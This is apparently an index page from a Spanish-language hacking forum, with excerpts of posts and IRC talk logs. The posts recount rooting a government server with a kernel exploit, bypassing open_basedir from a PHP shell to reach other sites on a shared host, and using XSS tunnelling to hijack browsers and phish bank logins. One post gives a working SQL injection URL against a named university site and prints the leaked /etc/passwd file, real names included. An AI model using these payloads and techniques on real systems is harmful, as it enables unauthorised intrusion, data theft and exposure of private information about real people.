Publicado el 10/02/2010 12:02:00 en Videos Hacking. Total de votos: 6 Votar
bueno como hace mucho que no posteo nada por falta de tiempo les dejo este mini video de un prosedimiento basico a la hora de obtener privilegios de root en un servidor linus.
el kernel 2.6.23 el exploit vmsplice mas conosido como jessica (que nombre de puta).
shell up cortesia de thanatos, server vln cortesia de los siempre vulnerables servidores de nuestro gov;
el video ya tiene sus meses grabado pero re100 hoy tube tiempo de subirlo a youtube y postearlo;
notaran en el video que demora en tomarme como root lo cual a simple viste aria pensar a cualkiera que no es rooteable (como el caso de unos amiwos que me comentaron que abian tenido el acceso pero no rooteo) pero como dicen con pasiensia y saliba ....... a la ormiga ^^.
Saludos CrL
------------------------------------------------
SE BUSCAN PATROSINADORES/COLABORADORES PARA DDLR
CON SOLO 5 DOLARES PODES COLABORAR PARA QUE LA
COMUNIDAD SIGA EN PIE; GRACIAS MURDER POR GARPAR
ENERO ^^ | VAMOS MUCHACHOS QUE ES POCO.
CUALQUIER COSA COMUNICARSE CON MURDER
-------------------------------------------------
Comentarios: 13 | Leer comentariosPublicado el 31/01/2010 12:01:00 en Diosdelared.
bueno para los que no estubieron, este domingo 31 de enero se llevaron acabo dos charlas sobre seguridad informatica en el irc de nuestra comunidad (irc.diosdelared.com #diosdelared)
la primera charla la dio Phreak y fue sobre Conversión de funciones C a ensamblador para payloads, la segunda fue sobre Pentesting de aplicaciones por 0o_zeus_o0.
Conversión de funciones C a ensamblador para payloads by Phreak
Phreak: A continuación escribo un ejemplo de un código simple de c y una función cualquiera.
Phreak: / Ejemplo.cpp
Phreak: #include <stdio.h>
Phreak: #include <Windows.h>
Phreak: void main()
Phreak: {
Phreak: Sleep(99999999);
Phreak: }
Phreak: crearemos una solución simple con el código descrito
Phreak: Pulsamos F10 para ver los módulos que carga nuestra ejemplo o aplicación con sus rangos de direcciones
Phreak: pero vamos a entrar en lo interesante
Phreak: con F10 podremos ver funciones y modulos de carga
Phreak: a continuación tambien veremos el código de desensamblado si pulsamos ALT + 8
Phreak: vamos a pastear el codigo de desensamblado
Phreak: queda decir obviamente que esta charla esta descrita y expuesta desde un
Phreak: windows xp sp3 en español, más adelante detallaré el porqué
Phreak: bien procedamos al código de desensamblado
Phreak: #include <stdio.h>
Phreak: #include <Windows.h>
Phreak: void main()
Phreak: {
Phreak: 004113A0 55 push ebp
Phreak: 004113A1 8B EC mov ebp,esp
Phreak: 004113A3 81 EC C0 00 00 00 sub esp,0C0h
Phreak: 004113A9 53 push ebx
Phreak: 004113AA 56 push esi
Phreak: 004113AB 57 push edi
Phreak: 004113AC 8D BD 40 FF FF FF lea edi,[ebp-0C0h]
Phreak: 004113B2 B9 30 00 00 00 mov ecx,30h
Phreak: 004113B7 B8 CC CC CC CC mov eax,0CCCCCCCCh
Phreak: 004113BC F3 AB rep stos dword ptr es:[edi]
Phreak: Sleep(99999999);
Phreak: 004113BE 8B F4 mov esi,esp
Phreak: 004113C0 68 FF E0 F5 05 push 5F5E0FFh
Phreak: 004113C5 FF 15 98 81 41 00 call dword ptr [__imp__Sleep...
Continúa aquí...Comentarios: 9 | Leer comentariosPublicado el 31/12/2009 12:12:00 en Hacking Web. Total de votos: 5 Votar
opa .. llevo tiempo sin postar! bueno antes que todo como parte del staff de diosdelared.com quiero desearles un muy feliz año nuevo para toda la comunidad, agradecerle a murder por hacer diosdelared.com posible, por su trabajo y dedicasion a este rincon donde aprendemos y enseñamos dia a dia, tambien agradecele a los colaboradores y a los usuarios por meterle pata para que estoy siga progresando!
dicho esto, a lo que vine!
hoy les traigo un bug para nada 0day pero son pocos los que saben de el!
se trata de una vulneravilidad en la funcion open base dir en los servidores de alojamiento gratuito de www.000webhost.com!
pekeña descripcion: con este bug podemos bypassear de una web a otra alojada en el mismo servidor con una phpshell sin permisos facilmente, lo que voy a explicar yo es como aprobechar de la mejor manera el bug!
primero que nada lo que necesitamos es una php shell montada en el servidor
ahora lo que vamos a hacer es hacerle un reverse dns a al dominio con la herramienta que usd mas deseen, yo use la de keynet que me resulta muy comoda, vamos a extraer todos los dominios y ponerlos en un txt, vamos a usar la opcion
buscar y remplazar del notepad para depurar los dominios asi solo dejamos los mas
sexys como .org .com .net .info y no esos feos subdominios free, en la imagen yo puse
buscar host56.com y
remplazar por unos ********
nos quedara asi
luego borramos todas las webs q terminen con ******* y nos van a quedar solo los dominios
sexys
ahora ya teniendo nuestra lista de dominios
sexys podemos pasar a aprobechar nuestro bug, notaran que en nuestra php shell tenemos la opcion de
go dir y nos figura el path donde esta alojada nuestra web /home/a8256618/plublic_html, bueno la funcion go dir de nuestra shell es la que usaremos para bypassear a la web objetivo en este caso sera
51dataentry.com/, bypassear es muy censillo, en go dir ponesmo /www/51dataentry.com/ y le damos nomas.
y una vez dentro de la web veriamos sus archivos/carpetas
ya una vez dentro de la web buscamos como sacarle el mejor probecho con los permisos que tengamos ya sea subiendole otra shell para tenerla de hackedhost, un bot o lo q fuere, en este caso yo tengo 777 en varias carpetas pero no en el public_html directamente, yo para la demostracion solo voy a subir un html aprobechando los permis...
Continúa aquí...Comentarios: 20 | Leer comentariosPublicado el 12/12/2009 12:12:00 en Diosdelared.
Hoy alrededor de las 16:30hs argentina se llevaron a cabo dos exelentes charlas en el irc de dios de la red.
La primera charla fue xss tunel por murder, una tecnica bastante potente si es bien implementada, en la charla murder nos explico que con esta tecnica podiamos de una manera controlar a la victima por medio de un tunel attackante/victima.
los ingredientes?: un javascript, un simple script en php con un poco de ingenio en un xss bug!
Xss tunnelling by MurdeR - logs de la charla
MurdeR: Bueno, ante todo bienvenidos!
MurdeR: damos inicio con la primer charla (y capaz que la unica)
MurdeR: Voy a hablar sobre XSS Tunneling
MurdeR: muchos no sabran que es o para que sirve, para ellos está enfocada esta charla
MurdeR: no voy a explicar conceptos muy avanzados porque requeriría de otro metodo
MurdeR: Primer lugar, que es el Tunneling?
MurdeR: consiste en "crear un puente" entre el dos puntos
MurdeR: en este caso un punto sería el "atacante" y el otro el "usuario" del navegador web
MurdeR: todos los navegadores webs ejecutan javascript hoy día
MurdeR: con esta tecnica lo que vamos a intentar es tomar control del navegador remoto
MurdeR: para moder hacer con el todo lo que javascript nos permita
MurdeR: en vivo y en directo!
MurdeR: Que se puede hacer?
MurdeR: desde abrirle una ventanita y ponerte a chatear hasta abrirle la web del bancox y pedirle que ingrese sus datos
MurdeR: todo en VIVO
MurdeR: que es lo interesante...
MurdeR: hay dos formas de realizar el tunnel
MurdeR: una es mediante infección y la otra mediante XSS
MurdeR: mediante infección es muchiiisimo mas util porque mientras el usuario permanesca infectado va a ser vulnerable
MurdeR: en cambio con XSS en cuanto el usuario abandona la web vulnerable, perdemos el control
MurdeR: logicamente....
MurdeR: Bueno
MurdeR: si alguno tiene alguna duda me la pasa por privado
MurdeR: yo las voy contestando, no dejen para el final pq despues es un despelote :P
MurdeR: Vamos a ver primero el caso de un ordenador infectado
MurdeR: supongamos que pepe ejecuta un programita que le mandamos
MurdeR: ese programita edita la configuracion de su /etc/host
MurdeR: o directamente la configuración de red
MurdeR: y nos da control sobre la resolucion de d...
Continúa aquí...Comentarios: 22 | Leer comentariosPublicado el 25/11/2009 12:11:00 en Hacking Web. Total de votos: 11 Votar
Bueno hoy en el tazón de leche voy a explicar un poquito de la función
load_file() en una SQLinjection
Y como sacarle provecho ^^
Bueno una breve explicación: la función
load_file() nos sirve para leer archivos del servidor como un ejemplo simple
El
/etc/passwd, lo q hacemos es poner la ruta del archivo que queremos ver en hexagesimal en nuestra injeccion y nos mostrara el archivo
plano: /etc/passwd
Hexa: 0x2f6574632f706173737764
Ejemplo: http://www.uaeh.edu.mx/inicio/detnoticia.php?id=-1+union+all+select+1,2,
load_file(0x2f6574632f706173737764),4,5,6,7,8,9--
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh dhcp:x:100:101::/nonexistent:/bin/false syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/home/klog:/bin/false sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin marisolr:x:1000:1000:Marisol Rodriguez Perez,,,:/home/marisolr:/bin/bash mysql:x:1001:1001::/home/mysql:/bin/sh pweb:x:1002:100:Pagina Web:/usr/local/apache2/nueva:/bin/bash shoutcast:x:1003:100::/home/shoutcast:/bin/bash ccastillo:x:1006:100::/home/ccastillo:/bin/bash aservin:x:1007:100:Alejandro Servin:/usr/local/apache2/catalogo:/bin/bash mpalomo:x:1008:100:Martin Palomo,,,:/home/mpalomo:/bin/bash laura:x:1009:100:Laura Edith Gonzalez Flores, Sria. General:/usr/local/apache2/nueva/consejo:/bin/bash postfix:x:104:112::/var/spool/postfix:/bin/false libuuid:x:105:114::/var/lib/libuuid:/bin/sh oweb:x:1010:1010:Sitio Web:/var/www:/bin/sh snmp:x:106:65534::/var/lib/snmp:/bin/false
Como sacarle provecho a la función load_file();
Bueno es relativamente fácil hacerlo ya q se mezclan las técnicas conocidas xD y es como estar jugando con la vieja LFI y el tan gastado hoy full path disclourse
La mayoría de las veces cuando encontramos un SQLi testeamos con ' y nos tira un error parecido a este
Warning: mysql_fetch_assoc()
Seguido de la ruta ahi ya tenemos nuestro path ejemplo:
/home/www/websita/public_html/inicio/script.php error línea 1337
Y podemos usar tranquilamente la función
loa...
Continúa aquí...Comentarios: 24 | Leer comentarios
![[x]](http://www.diosdelared.com/images/add.ico)
![[x]](http://www.diosdelared.com/redirect.php?go=http://img685.imageshack.us/img685/1104/crlvitamine.jpg "cereal")
Nick: cereal
![[x]](http://www.diosdelared.com/images/tecnico.jpg "Artículo técnico"){kind=small}
Rooteando el servidor de la Unión Cívica Radical (ucr)